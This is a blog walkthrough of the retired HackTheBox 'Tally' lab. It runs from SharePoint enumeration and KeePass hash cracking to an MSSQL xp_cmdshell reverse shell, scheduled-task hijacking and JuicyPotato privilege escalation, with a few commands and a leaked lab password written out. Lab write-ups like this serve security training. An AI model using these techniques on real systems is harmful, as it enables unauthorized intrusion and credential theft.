HacktheBox - Tally - Retired
Recon
Let's use threader3000 for our recon scan. It's a threaded scanner written in python that does a super quick up/down scan on all TCP ports, then suggests a nmap scan based on the results. It will automatically save the nmap scan results as XML, then we can convert it to HTML
There are a lot of open ports on this box
21,80,81,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670
Looks like this is a windows box with smb, SQL, http and a bunch of RPC ports.
Let's start with checking out smb to see if we can get any info out it.
Nope nothing open to anonymous users.
What about the ftp?
Same story nothing to anonymous users.
According to our nmap output it looks like port 80 is a sharepoint site, let's check it out next.
It does look like a sharepoint site.
The only thing we can do is a login Let's try just admin/admin
Didn't lets us in but we captured this in burp
There is some base64 here in the authorization field.
Ok.
Let's see if we can find anything else available to us on this port. Let's use a dirb to scan for any other directories or files we might have access to.
The folks over at BishopFox have given us a brute force tool that is tooled for Sharepoint so let's download the perl script and extensions file
https://resources.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/
perl SharePointURLBrute\ v1.1.pl -a "http://tally.htb" -e SharePoint-UrlExtensions-18Mar2012.txt
The last result here is interesting
FOUND: http://tally.htb/shared documents/forms/allitems.aspx
We can use online viewer to open it open to see the details of the ftp-details.docx
UTDRSCH53c"$6hys
So we have a password but no username.
Luckily another page gives us some more info
http://tally.htb/SitePages/FinanceTeam.aspx
Alright we got a username now to ftp_users
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm2LpWiqOr8xhf0FBzFZ3z28ymlZ-lMkSJm6jtXB2atOrvpflPEBR5QBCVed8bmUsPy8d_0kayq3qbKGy4QiXAwGGJvMXglRPTGEWNP2jChrp15GXRc7eRD2Ojxj2EpTV1xgCE46W_seIa/s320/tenor+%252816%2529.gif)
Let's use filezilla to download all the files here in case there is some more data in here.
There are some todo notes in the IT users folder Sarah and Tim
Sarah
Tim
Password in keepass? That sounds promising.
In his folder we do see a tim.kdbx file which could be a keepass database for Tim.
Let's transfer this over to a windows box since keepass is a windows program.
If we try to open the kdbx we get this.
We need a password….
Let's see if we can use johntheRipper to get it
Here is blog that describes the steps
https://tzusec.com/tag/keepass2john/
First we need to format this in a way that john likes we can use the builtin app keepass2john
/usr/sbin/keepass2john ./tim.kdbx
Which gives us this output that we can save out to a file called keepasshash
It should only take a minute or two to get the password out.
There were a couple of password in the database but one that jumps out
Tally Acct Share
Let's bounce back to smb now that we might have some creds that should work for smb
There is an ACCT share and some other admin shares, Let's try the admin shares first just in case.
Nope.
Okay what about the ACCT Share
Some folders here to check out.
Under zz_Archived/SQL we can find this file conn-info.txt
Looks like what used to be the SA password for sql, but it says they have been changed..
Another interesting finding that probably won't help us own this box…. But apparently they have a spreadsheet of all their customers along with their credit card numbers…. I don't think these guys are PCI Compliant.
Let's keep poking around..
In the acct/zz_Migration/Binaries/New folder/ we can see a bunch of executables and one with an interesting name of tester.exe.
Let's grab a copy and see what it is.
Let's try running strings against it to see if we can get it to leak out what it is or what it is doing..
Looks like we have another possible SA password
Let's use a tool called mssql-cli
https://github.com/dbcli/mssql-cli
Let's first see what databases are on the server.
select name FROM master.dbo.sysdatabases;
Ok we have master, tempdb, model and msdb
Let's see about tables in these databases
There are some tables in master, nothing in tempdb or model… but a whole lot in msdb ( which is expected since it's the workhorse db for mssql)
We can find the next command on this site which is a good resource here for looking at mssql
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
It even gives a pro tip, that whoever is running MSSQL most likely has SeImpersonatePrivlege rights, and is probably vulnerable to a Juicy-Potato attack.
There is a hash here for the sa account but we already know that password, it looks like sarah has a login here to sql also but no hash stored.
Poking around in the DBs we can't really find anything interesting.
Exploit
However since we have SA on this DB we might be able to use it to run some commands on the box.
Looks like xp_cmdshell is not enabled…. Guess what we are the sa and we can do whatever we want. Let's enable it. :)
Much better
Let's get a real shell
We'll use Nishang's Invoke-PowerShellTcp.ps1
First download the file or clone the git if you don't already have it.
https://github.com/samratashok/nishang
Copy Invoke-PowershellTCP.ps1 to a folder you want to serve it from.
Add this line to the bottom of scripts so it will run after download.( with your VPN IP and choice of port though)
Next we need to set up a listener on our kali box
Then on our SA connection to tally we will put in
** There is a process here re-disabling xm_cmdshell so you might need to redo that part if you are going too slow*******
With any luck we should get a powershell reverse shell back now.
And we can get our user.txt now
Now we just need to escalate, remember earlier the tip the other site gave us about our users maybe having SeImpersonatePrivleges??
Lets' check
Yup
Ok so we should be able to use a potato priv esc here.
But let's poke around and see if there is another path.
Look at these two files. SPBestWarmUp.ps1 & SPBestWarmUp.xml
This sure looks like the XML for a scheduled task…. And even better it looks like one that runs as administrator
And it's just running this powershell file on Sarah's Desktop
So If we overwrite the file it will run what we want it to run as Administrator…
Let's try it.
We had good luck with our first reverse powershell, let's just modify it to use a different port and overwrite the file with it. We just need to rename it to something else ( I just added -Admin to the end) and modify the last line to invoke to be a different port that we are already using.
Let's start a new listener for that port.
Then overwrite the ps1 on her desktop with a new ps1
Then we can use echo to overwrite the file on Tally
Now we just need to wait for the task to fire.
Here comes the bad news with this method….
^^^ that means it only runs once an hour….. Which really sucks for me because I missed a quotation mark the first time I tried this and had to wait almost two full hours…..
Theoretically this should work if the administrator account is running this scheduled task.. I'm done waiting for it.. Let's potato this bad boy
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpFgnqlPof5kx2VMe73XUy1yNV3Zg1uPDRmpq1L-MljXSXIAboeCvNIksJwjbcuL_PO3aut1rv8COkIbDp14Nyip5F4IE_163tHP0EL32JjMkOi4r9Y9UqtC0ZmhsVDHg0TcraXnWOfJac/w346-h240/tenor+%252818%2529.gif)
Let's use the same path we used on bounty
Grab a copy of juicy potato
https://github.com/ohpe/juicy-potato/releases
Use certutil to download it to tally
Create a bat file for a reverse shell I used a power shell on here
I created it on kali and used certutil and updog to download it to tally
Then just ran Juicy Potato using the defaults and pointing it to rshell.bat
And there we go we got our root flag.
Comments
Post a Comment